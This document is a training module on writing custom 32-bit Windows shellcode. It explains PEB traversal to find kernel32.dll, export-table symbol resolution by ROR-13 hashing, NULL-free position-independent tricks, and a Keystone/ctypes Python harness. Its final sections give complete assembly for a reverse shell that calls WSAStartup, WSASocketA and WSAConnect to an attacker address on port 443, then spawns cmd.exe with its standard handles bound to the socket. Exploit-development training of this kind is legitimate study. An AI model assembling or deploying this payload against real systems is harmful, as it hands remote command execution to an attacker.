- Introduction
- Calling Conventions on x86
- The System Call Problem
- Finding kernel32.dll
- Resolving Symbols
- NULL-Free Position-Independent Shellcode (PIC)
- Reverse Shell Implementation
- Conclusion
In previous modules, various payloads were generated using the Metasploit Framework for exploits. This module focuses on understanding how shellcode works internally and developing custom reverse shells from scratch.
Shellcode is a set of CPU instructions designed to be executed after a vulnerability is successfully exploited. Originally, the term referred to exploit code used to spawn a root shell, but modern shellcode can perform much more complex operations including reverse shells, bind shells, and arbitrary code execution.
Key characteristics of shellcode:
- Written in assembly language and translated to hexadecimal opcodes
- Can directly manipulate CPU registers and call system functions
- Must be universal and reliable across different Windows versions
- Requires low-level operating system knowledge
Writing effective shellcode for Windows platforms is challenging due to the complexity of the operating system architecture and the need for portability across different versions.
Calling conventions define the schema used to invoke function calls and are critical for shellcode developers. They specify:
- How arguments are passed to functions
- Which registers the callee must preserve for the caller
- How the stack frame is prepared before the call
- How the stack frame is restored after the call
__stdcall Convention:
- Used by Win32 API functions
- Parameters pushed to stack in reverse order
- Stack cleaned up by the callee
__cdecl Convention:
- Used by C runtime functions
- Parameters pushed to stack in reverse order
- Stack cleaned up by the caller
On 32-bit systems, register handling follows specific rules:
Volatile Registers (can be clobbered):
- EAX, EDX, ECX
Non-volatile Registers (must be preserved):
- All other registers must be preserved by the callee
Note: "Clobbered" refers to overwriting a CPU register's value during a function call without restoring it to the original value before returning.
graph TD
A[Function Call] --> B{Calling Convention}
B -->|__stdcall| C[Win32 API Functions]
B -->|__cdecl| D[C Runtime Functions]
C --> E[Callee cleans stack]
D --> F[Caller cleans stack]
E --> G[Parameters in reverse order]
F --> G
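The difference between the two conventions can be illustrated with a toy stack model. This is only a sketch: the list stands in for the stack, each element is one 4-byte slot, and the `call` helper is a hypothetical name, not part of any API.

```python
# Toy model of a 32-bit stack: each list element stands for one 4-byte slot.
def call(stack, args, callee_cleans):
    """Push args right-to-left, simulate CALL/RET, then clean up per convention."""
    depth_before = len(stack)
    for arg in reversed(args):          # the last argument is pushed first
        stack.append(arg)
    stack.append("return address")      # CALL pushes the return address
    first_arg = stack[-2]               # on entry, the first argument is at [esp+4]
    stack.pop()                         # RET pops the return address
    if callee_cleans:
        caller_fixup = 0                # __stdcall: callee ran `ret 4*len(args)`
    else:
        caller_fixup = 4 * len(args)    # __cdecl: caller must run `add esp, N`
    del stack[depth_before:]            # arguments are gone either way
    return first_arg, caller_fixup

print(call([], [1, 2, 3], callee_cleans=True))
print(call([], [1, 2, 3], callee_cleans=False))
```

For shellcode this matters mostly in one direction: after calling a Win32 API function (`__stdcall`), no stack adjustment is needed, so the call sequences stay short.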
System calls (syscalls) provide an interface between user space and the protected kernel, allowing access to low-level operating system functions for:
- Input/Output operations
- Thread synchronization
- Socket management
- Memory management
The Windows Native API is equivalent to the system call interface on UNIX systems. Key characteristics:
- Mostly undocumented interface exposed by ntdll.dll
- Hidden behind higher-level APIs due to NT architecture
- Supports multiple operating system APIs (Win32, OS/2, POSIX, DOS/Win16)
- System call numbers change between Windows versions (unlike Linux)
Windows limitations for shellcode development:
- Limited feature set in system call interface
- No socket API via direct system calls
- Need to use Windows API through Dynamic Link Libraries (DLLs)
- Must avoid hard-coded function addresses for portability
flowchart LR
A[Shellcode Needs] --> B[Avoid Direct Syscalls]
B --> C[Use Windows API via DLLs]
C --> D[Load/Locate DLLs in Memory]
D --> E[Resolve Function Addresses]
E --> F[Execute Required Functions]
Essential functions for this process:
- LoadLibraryA: Load DLLs into memory
- GetModuleHandleA: Get base address of loaded DLL
- GetProcAddress: Resolve function symbols
- kernel32.dll: Contains all necessary APIs (almost always loaded)
kernel32.dll is the foundation for shellcode development because:
- Contains LoadLibrary and GetProcAddress APIs
- Required to load additional DLLs and resolve functions
- Almost guaranteed to be loaded in process memory
- Exports core APIs required for most processes
The most reliable technique for determining kernel32.dll base address involves parsing the Process Environment Block (PEB).
The PEB is allocated by the operating system for every running process and can be found by traversing process memory starting at the FS register address.
graph TD
A[FS Register] --> B[Thread Environment Block - TEB]
B --> C[PEB Pointer at offset 0x30]
C --> D[PEB Structure]
D --> E[_PEB_LDR_DATA at offset 0x0C]
E --> F[Three Linked Lists]
F --> G[InLoadOrderModuleList]
F --> H[InMemoryOrderModuleList]
F --> I[InInitializationOrderModuleList]
_PEB_LDR_DATA Structure:
+0x00c InLoadOrderModuleList
+0x014 InMemoryOrderModuleList
+0x01c InInitializationOrderModuleList
_LDR_DATA_TABLE_ENTRY Structure:
+0x000 InLoadOrderLinks
+0x008 InMemoryOrderLinks
+0x010 InInitializationOrderLinks
+0x018 DllBase (Base Address)
+0x01c EntryPoint
+0x020 SizeOfImage
+0x024 FullDllName (UNICODE_STRING)
+0x02c BaseDllName (UNICODE_STRING)
The shellcode traverses the InInitializationOrderModuleList to find kernel32.dll:
- Access PEB through FS:[0x30]
- Navigate to _PEB_LDR_DATA structure
- Iterate through InInitializationOrderModuleList
- Check each module name for a terminator at character index 12, which matches the 12-character name "kernel32.dll"
- Extract base address from DllBase field
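One detail is easy to miss: the list pointers do not point at the start of an `_LDR_DATA_TABLE_ENTRY`, but at the link field inside it. The sketch below recomputes the offsets as seen from a pointer into `InInitializationOrderLinks`, using the structure offsets listed above and assuming the standard 32-bit `UNICODE_STRING` layout (two `USHORT` fields followed by the `Buffer` pointer). The constant and function names are illustrative.

```python
# Offsets copied from the _LDR_DATA_TABLE_ENTRY listing above (32-bit layout).
IN_INIT_ORDER_LINKS = 0x10
DLL_BASE = 0x18
BASE_DLL_NAME = 0x2C
# UNICODE_STRING on x86: USHORT Length, USHORT MaximumLength, PWSTR Buffer.
UNICODE_STRING_BUFFER = 0x04

def relative_to_init_links(field_offset):
    """Offset of a field as seen from a pointer into InInitializationOrderLinks."""
    return field_offset - IN_INIT_ORDER_LINKS

dll_base_rel = relative_to_init_links(DLL_BASE)
name_buffer_rel = relative_to_init_links(BASE_DLL_NAME + UNICODE_STRING_BUFFER)
print(hex(dll_base_rel), hex(name_buffer_rel))  # 0x8 0x20
```

These two values are the displacements the assembly uses when it reads the base address and the module name pointer from the current list entry.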
The development harness uses the Keystone engine to assemble the code and Python's ctypes module to call the Windows API:
Python Setup Code:
import ctypes, struct
from keystone import *
# Initialize Keystone engine in 32-bit mode
ks = Ks(KS_ARCH_X86, KS_MODE_32)
# Compile assembly instructions
encoding, count = ks.asm(CODE)
shellcode = bytearray(encoding)
Core Assembly Implementation:
start:
int3 ; Breakpoint for debugging
mov ebp, esp ; Set up stack frame
sub esp, 60h ; Allocate stack space
find_kernel32:
xor ecx, ecx ; ECX = 0
mov esi, fs:[ecx+30h] ; ESI = &(PEB)
mov esi, [esi+0Ch] ; ESI = PEB->Ldr
mov esi, [esi+1Ch] ; ESI = PEB->Ldr.InInitOrder
next_module:
mov ebx, [esi+8h] ; EBX = InInitOrder[X].base_address
mov edi, [esi+20h] ; EDI = InInitOrder[X].module_name
mov esi, [esi] ; ESI = InInitOrder[X].flink (next)
cmp [edi+12*2], cx ; Check if modulename[12] == 0x00
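jne next_module ; No: try next module
This technique relies on the length of the module name rather than on its position in the list: the loop stops at the first module whose Unicode base name has its terminator at character index 12, and "kernel32.dll" is exactly 12 characters long. Modules that precede it in InInitializationOrderModuleList, such as ntdll.dll, have names of a different length and are skipped.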
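The exit condition of the loop can be reproduced offline. The sketch below mimics `cmp [edi+12*2], cx` against UTF-16LE name buffers. The `0xCC` padding is an assumption standing in for whatever memory happens to follow a shorter name, and the module names are only examples.

```python
def terminator_at_index_12(module_name):
    """Mimic `cmp [edi+12*2], cx` with CX = 0 against a UTF-16LE name buffer."""
    # 0xCC padding stands in for unknown memory after the string (assumption).
    buf = (module_name + "\0").encode("utf-16-le") + b"\xcc" * 32
    return buf[12 * 2 : 12 * 2 + 2] == b"\x00\x00"

for name in ("ntdll.dll", "KERNELBASE.dll", "kernel32.dll"):
    print(name, terminator_at_index_12(name))
```

Note that any other module with a 12-character name would also satisfy the check, so the approach depends on kernel32.dll being the first such module in the list.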
Once kernel32.dll base address is obtained, the next step is resolving exported function addresses. This is accomplished by traversing the Export Address Table (EAT) instead of relying on GetProcAddress.
typedef struct _IMAGE_EXPORT_DIRECTORY {
DWORD Characteristics;
DWORD TimeDateStamp;
WORD MajorVersion;
WORD MinorVersion;
DWORD Name;
DWORD Base;
DWORD NumberOfFunctions;
DWORD NumberOfNames;
DWORD AddressOfFunctions; // RVA of function addresses array
DWORD AddressOfNames; // RVA of function names array
DWORD AddressOfNameOrdinals; // RVA of ordinals array
} IMAGE_EXPORT_DIRECTORY;
graph LR
A[AddressOfNames Array] --> B[Function Names]
C[AddressOfNameOrdinals Array] --> D[Ordinal Values]
E[AddressOfFunctions Array] --> F[Function RVAs]
B --> G[Index i]
G --> D
D --> H[New Index j]
H --> F
F --> I[Function VMA = RVA + DLL Base]
The symbol resolution process follows these steps:
- Locate Export Directory Table:
mov eax, [ebx+3Ch] ; Offset to PE Signature
mov edi, [ebx+eax+78h] ; Export Table Directory RVA
add edi, ebx ; Export Table Directory VMA
- Access Arrays:
mov ecx, [edi+18h] ; NumberOfNames
mov eax, [edi+20h] ; AddressOfNames RVA
add eax, ebx ; AddressOfNames VMA
mov [ebp-4], eax ; Save AddressOfNames VMA
- Iterate Through Names:
find_function_loop:
jecxz find_function_finished ; Jump if ECX is 0
dec ecx ; Decrement counter
mov eax, [ebp-4] ; Restore AddressOfNames VMA
mov esi, [eax+ecx*4] ; Get RVA of symbol name
add esi, ebx ; Set ESI to VMA of symbol name
To optimize shellcode size and enable reusable symbol resolution, a hashing algorithm converts function names to 4-byte hashes.
compute_hash:
xor eax, eax ; NULL EAX
cdq ; NULL EDX
cld ; Clear direction flag
compute_hash_again:
lodsb ; Load next byte from ESI into AL
test al, al ; Check for NULL terminator
jz compute_hash_finished ; Jump if NULL terminator found
ror edx, 0Dh ; Rotate EDX 13 bits right
add edx, eax ; Add byte to accumulator
jmp compute_hash_again ; Next iteration
compute_hash_finished:
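; EDX now contains the 4-byte hash of the name (collisions are possible but unlikely)
Python Hash Helper:
#!/usr/bin/python
import sys
import numpy

def ror_str(byte, count):
    # Rotate a 32-bit value right by `count` bits using its binary string form
    binb = numpy.base_repr(byte & 0xFFFFFFFF, 2).zfill(32)
    while count > 0:
        binb = binb[-1] + binb[0:-1]
        count -= 1
    return int(binb, 2)

def compute_hash(function_name):
    edx = 0x00
    ror_count = 0
    for eax in function_name:
        # Mask to 32 bits so the addition wraps like the ADD instruction
        edx = (edx + ord(eax)) & 0xFFFFFFFF
        if ror_count < len(function_name) - 1:
            edx = ror_str(edx, 0xd)
        ror_count += 1
    return hex(edx)

if __name__ == "__main__":
    print(compute_hash(sys.argv[1]))
# Example usage:
# python ComputeHash.py TerminateProcess
# Output: 0x78b5b983
Once the correct hash is found, retrieve the function's Virtual Memory Address: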
find_function_compare:
cmp edx, [esp+24h] ; Compare computed hash with target
jnz find_function_loop ; If no match, try next function
; Hash matches - get function address
mov edx, [edi+24h] ; AddressOfNameOrdinals RVA
add edx, ebx ; AddressOfNameOrdinals VMA
mov cx, [edx+2*ecx] ; Get function's ordinal
mov edx, [edi+1Ch] ; AddressOfFunctions RVA
add edx, ebx ; AddressOfFunctions VMA
mov eax, [edx+4*ecx] ; Get function RVA
add eax, ebx ; Get function VMA
mov [esp+1Ch], eax ; Store in stack for return
Symbol Resolution Flow:
sequenceDiagram
participant SC as Shellcode
participant EDT as Export Directory Table
participant AN as AddressOfNames
participant ANO as AddressOfNameOrdinals
participant AF as AddressOfFunctions
SC->>EDT: Access Export Directory
EDT->>AN: Get AddressOfNames array
SC->>AN: Iterate through function names
AN->>SC: Return function name
SC->>SC: Compute hash of name
SC->>SC: Compare with target hash
alt Hash matches
SC->>ANO: Get ordinal using same index
ANO->>SC: Return ordinal value
SC->>AF: Use ordinal as index
AF->>SC: Return function RVA
SC->>SC: Add DLL base to get VMA
else Hash doesn't match
SC->>AN: Try next function name
end
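The lookup through the three export arrays can be modeled with plain lists. The sketch below uses a made-up base address, made-up RVAs, and a three-entry export table, and compares names directly instead of hashes to keep the indexing visible. None of the values come from a real DLL.

```python
DLL_BASE = 0x76000000  # hypothetical load address

# Toy export directory: the name index i maps through the ordinal array to j.
address_of_names = ["CreateProcessA", "LoadLibraryA", "TerminateProcess"]
address_of_name_ordinals = [2, 0, 1]
address_of_functions = [0x1F00, 0x2A40, 0x1100]  # RVAs, made-up values

def resolve(name):
    """Return the VMA of an exported name, or None if it is not exported."""
    # Walk the names from the last index down, like the ECX-driven loop.
    for i in range(len(address_of_names) - 1, -1, -1):
        if address_of_names[i] == name:
            j = address_of_name_ordinals[i]             # same index i, new index j
            return DLL_BASE + address_of_functions[j]   # VMA = base + RVA
    return None

print(hex(resolve("LoadLibraryA")))
print(resolve("NoSuchExport"))
```

The important point is that the index into `AddressOfNames` is not used directly on `AddressOfFunctions`; it must first be translated through `AddressOfNameOrdinals`.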
NULL bytes (0x00) are problematic in shellcode because they often terminate string operations in vulnerable applications. Several techniques eliminate NULL bytes:
Instead of:
sub esp, 200h ; Immediate 0x00000200 contains NULL bytes
Use:
add esp, 0xFFFFFDF0 ; Adds -0x210: reserves slightly more space, with no NULL bytes
Replace instructions that generate NULL bytes:
; Avoid CALL instructions with positive offsets
; Use alternative instruction sequences
Position-independent code (PIC) can execute correctly regardless of its memory location. This is achieved by:
find_function_shorten:
jmp find_function_shorten_bnc ; Short jump
find_function_ret:
pop esi ; Get return address
mov [ebp+04h], esi ; Save for later use
jmp resolve_symbols_kernel32
find_function_shorten_bnc:
call find_function_ret ; Call with negative offset
PIC Implementation Flow:
graph TD
A[Shellcode Entry] --> B[Short Jump Forward]
B --> C[Call Backward]
C --> D[Push Return Address]
D --> E[Pop Address into Register]
E --> F[Calculate Relative Offsets]
F --> G[Execute Position-Independent Code]
This technique exploits the fact that:
- CALL instruction pushes return address onto stack
- POP retrieves this address for relative calculations
- Negative offsets typically avoid NULL bytes
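Why small positive values produce NULL bytes while small negative ones usually do not follows from the little-endian two's-complement encoding of 32-bit immediates and relative offsets. The sketch below only inspects the 4-byte operand, not the full instruction encoding, and the helper names are illustrative.

```python
import struct

def imm32(value):
    """Little-endian encoding of a signed 32-bit immediate or relative offset."""
    return struct.pack("<i", value)

def has_null(data):
    """True if the byte string contains at least one 0x00 byte."""
    return b"\x00" in data

def as_signed32(value):
    """Interpret an unsigned 32-bit constant as a two's-complement signed value."""
    return value - (1 << 32) if value & 0x80000000 else value

# Stack allocation: 0x200 as an immediate versus adding a negative constant.
print(imm32(0x200).hex(), has_null(imm32(0x200)))
print(as_signed32(0xFFFFFDF0), imm32(as_signed32(0xFFFFFDF0)).hex())

# Relative CALL offsets: forward (positive) versus backward (negative).
print(imm32(0x30).hex(), has_null(imm32(0x30)))
print(imm32(-0x30).hex(), has_null(imm32(-0x30)))
```

A small positive value leaves its upper bytes at `00`, while the same magnitude negated fills them with `ff`. Negative values can still contain a NULL byte in the low positions (for example `-0x200`), so the final bytes should always be checked.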
To create a reverse shell, the shellcode must load the Winsock library and resolve networking functions.
From kernel32.dll:
- CreateProcessA (hash: 0x16b3fe72)
- LoadLibraryA (hash: 0xec0e4e8e)
- TerminateProcess (hash: 0x78b5b983)
From ws2_32.dll:
- WSAStartup (hash: 0x3bfcedcb)
- WSASocketA (hash: 0xadf509d9)
- WSAConnect (hash: 0xb32dba0c)
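The values in the lists above can be recomputed with a few lines of integer arithmetic. This is a minimal sketch of the rotate-right-by-13 and add scheme described earlier, written without external dependencies. The function names are illustrative.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by `count` bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF

def ror13_hash(name):
    """Hash an ASCII export name: rotate the accumulator, then add each byte."""
    h = 0
    for byte in name.encode("ascii"):
        h = (ror32(h, 13) + byte) & 0xFFFFFFFF
    return h

for name in ("CreateProcessA", "LoadLibraryA", "TerminateProcess",
             "WSAStartup", "WSASocketA", "WSAConnect"):
    print(f"{name}: {ror13_hash(name):#010x}")
```

Because the hash is case-sensitive and covers the whole name, closely related exports such as `connect` and `WSAConnect` produce unrelated values, so it is worth recomputing each constant rather than copying it.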
load_ws2_32:
xor eax, eax ; NULL EAX
mov ax, 6C6Ch ; Move end of string "ll"
push eax ; Push with NULL terminator
push 642E3233h ; Push "32.d"
push 5F327377h ; Push "ws2_"
push esp ; Push pointer to string
call dword ptr [ebp+14h] ; Call LoadLibraryA
resolve_symbols_ws2_32:
mov ebx, eax ; Move ws2_32.dll base to EBX
; Now resolve individual functions using find_function
WSAStartup initializes the Winsock DLL for use by the shellcode.
int WSAStartup(
WORD wVersionRequired, // Version 2.2 (0x0202)
LPWSADATA lpWSAData // Pointer to WSADATA structure
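);
The WSADATA structure occupies about 400 bytes (0x190) on 32-bit Windows. The code places it 0x590 bytes below ESP so that later pushes do not overwrite it:
call_wsastartup:
mov eax, esp ; Current stack pointer
xor ecx, ecx ; NULL ECX so the upper 16 bits are known
mov cx, 590h ; Offset larger than the structure size
sub eax, ecx ; Avoid overwriting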
push eax ; Push lpWSAData pointer
xor eax, eax ; NULL EAX
mov ax, 202h ; Version 2.2
push eax ; Push wVersionRequired
call dword ptr [ebp+1Ch] ; Call WSAStartup
Creates a socket for network communication.
SOCKET WSASocketA(
int af, // Address family (AF_INET = 2)
int type, // Socket type (SOCK_STREAM = 1)
int protocol, // Protocol (IPPROTO_TCP = 6)
LPWSAPROTOCOL_INFOA lpProtocolInfo, // NULL
GROUP g, // NULL
DWORD dwFlags // NULL
);
call_wsasocketa:
xor eax, eax ; NULL EAX
push eax ; Push dwFlags (NULL)
push eax ; Push g (NULL)
push eax ; Push lpProtocolInfo (NULL)
mov al, 06h ; IPPROTO_TCP
push eax ; Push protocol
sub al, 05h ; AL = 1 (SOCK_STREAM)
push eax ; Push type
inc eax ; EAX = 2 (AF_INET)
push eax ; Push af
call dword ptr [ebp+20h] ; Call WSASocketA
Establishes connection to the target system.
typedef struct sockaddr_in {
short sin_family; // AF_INET (2)
USHORT sin_port; // Port number (443 = 0x01BB)
IN_ADDR sin_addr; // IP address (192.168.119.120)
CHAR sin_zero[8]; // Reserved (NULL)
} SOCKADDR_IN;
call_wsaconnect:
mov esi, eax ; Save socket descriptor
xor eax, eax ; NULL EAX
push eax ; Push sin_zero[4-7]
push eax ; Push sin_zero[0-3]
push 7877a8c0h ; Push sin_addr (192.168.119.120 reversed)
mov ax, 0bb01h ; Port 443 in network byte order
shl eax, 10h ; Shift to upper 16 bits
add ax, 02h ; Add AF_INET
push eax ; Push sin_port & sin_family
; Get pointer to structure
push esp ; Push pointer to sockaddr_in
pop edi ; Store in EDI
; Set up remaining parameters
xor eax, eax ; NULL EAX
push eax ; Push lpGQOS (NULL)
push eax ; Push lpSQOS (NULL)
push eax ; Push lpCalleeData (NULL)
push eax ; Push lpCallerData (NULL)
add al, 10h ; namelen = 16
push eax ; Push namelen
push edi ; Push *name (sockaddr_in)
push esi ; Push socket descriptor
call dword ptr [ebp+24h] ; Call WSAConnect
Creates the cmd.exe process with redirected I/O handles.
BOOL CreateProcessA(
LPCSTR lpApplicationName, // NULL
LPSTR lpCommandLine, // "cmd.exe"
LPSECURITY_ATTRIBUTES lpProcessAttributes, // NULL
LPSECURITY_ATTRIBUTES lpThreadAttributes, // NULL
BOOL bInheritHandles, // TRUE
DWORD dwCreationFlags, // NULL
LPVOID lpEnvironment, // NULL
LPCSTR lpCurrentDirectory, // NULL
LPSTARTUPINFOA lpStartupInfo, // Configured structure
LPPROCESS_INFORMATION lpProcessInformation // Output structure
);
The STARTUPINFOA structure (68 bytes) must be configured to redirect standard I/O:
create_startupinfoa:
push esi ; hStdError (socket)
push esi ; hStdOutput (socket)
push esi ; hStdInput (socket)
xor eax, eax ; NULL EAX
push eax ; lpReserved2 (NULL)
push eax ; cbReserved2 & wShowWindow (NULL)
mov al, 80h ; EAX = 0x80
xor ecx, ecx ; NULL ECX
mov cl, 80h ; ECX = 0x80 (8-bit move keeps the encoding NULL-free)
add eax, ecx ; EAX = 0x100
push eax ; dwFlags (STARTF_USESTDHANDLES = 0x100)
; Push remaining NULL fields
xor eax, eax
push eax ; dwFillAttribute
push eax ; dwYCountChars
push eax ; dwXCountChars
push eax ; dwYSize
push eax ; dwXSize
push eax ; dwY
push eax ; dwX
push eax ; lpTitle
push eax ; lpDesktop
push eax ; lpReserved
mov al, 44h ; Structure size (68 bytes)
push eax ; cb
push esp ; Get pointer to structure
pop edi ; Store in EDI
create_cmd_string:
mov eax, 0ff9a879bh ; Negative value to avoid NULL
neg eax ; EAX = 00657865 ("exe\0")
push eax ; Push "exe\0"
push 2E646D63h ; Push "cmd."
push esp ; Get pointer to "cmd.exe"
pop ebx ; Store in EBX
call_createprocessa:
mov eax, esp ; Current stack pointer
xor ecx, ecx ; NULL ECX
mov cx, 390h ; Reserve space for PROCESS_INFORMATION
sub eax, ecx ; Calculate lpProcessInformation
push eax ; Push lpProcessInformation
push edi ; Push lpStartupInfo
; Push NULL parameters
xor eax, eax ; NULL EAX
push eax ; lpCurrentDirectory
push eax ; lpEnvironment
push eax ; dwCreationFlags
inc eax ; EAX = 1 (TRUE)
push eax ; bInheritHandles
dec eax ; EAX = 0 (NULL)
push eax ; lpThreadAttributes
push eax ; lpProcessAttributes
push ebx ; lpCommandLine ("cmd.exe")
push eax ; lpApplicationName (NULL)
call dword ptr [ebp+18h] ; Call CreateProcessA
graph TD
A[Shellcode Entry Point] --> B[Find kernel32.dll via PEB]
B --> C[Resolve kernel32 symbols]
C --> D[Load ws2_32.dll]
D --> E[Resolve ws2_32 symbols]
E --> F[Call WSAStartup]
F --> G[Call WSASocketA]
G --> H[Call WSAConnect]
H --> I[Create STARTUPINFOA]
I --> J[Call CreateProcessA]
J --> K[Reverse Shell Active]
subgraph "Symbol Resolution Process"
L[Hash Function Name] --> M[Search Export Table]
M --> N[Compare Hashes]
N -->|Match| O[Get Function Address]
N -->|No Match| P[Try Next Function]
P --> M
end
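Several steps in the flow above build data directly on the stack with `push`, which means the bytes must be split into little-endian dwords and pushed last chunk first. The sketch below recomputes the constants used for the `ws2_32.dll` and `cmd.exe` strings and for the `sockaddr_in` structure, using the IP address and port from this module. The `stack_dwords` helper is a hypothetical name introduced for illustration.

```python
import socket
import struct

def stack_dwords(data):
    """Split bytes into little-endian dwords, in push order (last chunk first)."""
    padded = data + b"\x00" * (-len(data) % 4)   # pad to a multiple of 4 bytes
    dwords = [struct.unpack("<I", padded[i:i + 4])[0]
              for i in range(0, len(padded), 4)]
    return dwords[::-1]

# sockaddr_in: sin_family is little-endian; sin_port and sin_addr are in
# network byte order; sin_zero is eight zero bytes.
sockaddr = (struct.pack("<H", socket.AF_INET)
            + struct.pack(">H", 443)
            + socket.inet_aton("192.168.119.120")
            + b"\x00" * 8)

print([hex(d) for d in stack_dwords(b"ws2_32.dll")])
print([hex(d) for d in stack_dwords(b"cmd.exe")])
print([hex(d) for d in stack_dwords(sockaddr)])

# "exe\0" as a dword contains a NULL byte, so its two's-complement negation
# is loaded instead and restored with NEG.
print(hex(-0x00657865 & 0xFFFFFFFF))
```

Dwords that come out containing a zero byte are the ones that need a workaround in the assembly, such as loading a 16-bit register, shifting, or negating a constant.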
- Always preserve non-volatile registers
- Use stack space efficiently to avoid overwrites
- Calculate proper offsets for structure storage
- Check return values for API success
- Handle edge cases in symbol resolution
- Ensure graceful shellcode termination
- Reuse assembly instruction sequences
- Minimize shellcode size through efficient coding
- Use negative offsets to avoid NULL bytes
- Avoid hardcoded addresses for portability
- Handle ASLR (Address Space Layout Randomization)
- Ensure compatibility across Windows versions
This module demonstrated the complete process of creating custom Windows shellcode from scratch. Key learning outcomes include:
- Understanding Windows Architecture: How DLLs, APIs, and system calls interact
- Dynamic Symbol Resolution: Avoiding hardcoded addresses through PEB traversal and EAT parsing
- Position-Independent Code: Creating shellcode that works regardless of memory location
- NULL-Byte Avoidance: Techniques to eliminate problematic bytes from shellcode
- Practical Implementation: Building a functional reverse shell using Windows networking APIs
The techniques covered provide a foundation for developing reliable, portable shellcode for Windows environments. While this implementation prioritizes clarity and understanding over size optimization, the same principles apply to creating more compact shellcode variants.
Advanced Topics for Further Study:
- Shellcode encoders and decoders
- Anti-debugging and evasion techniques
- 64-bit shellcode development
- Advanced payload staging techniques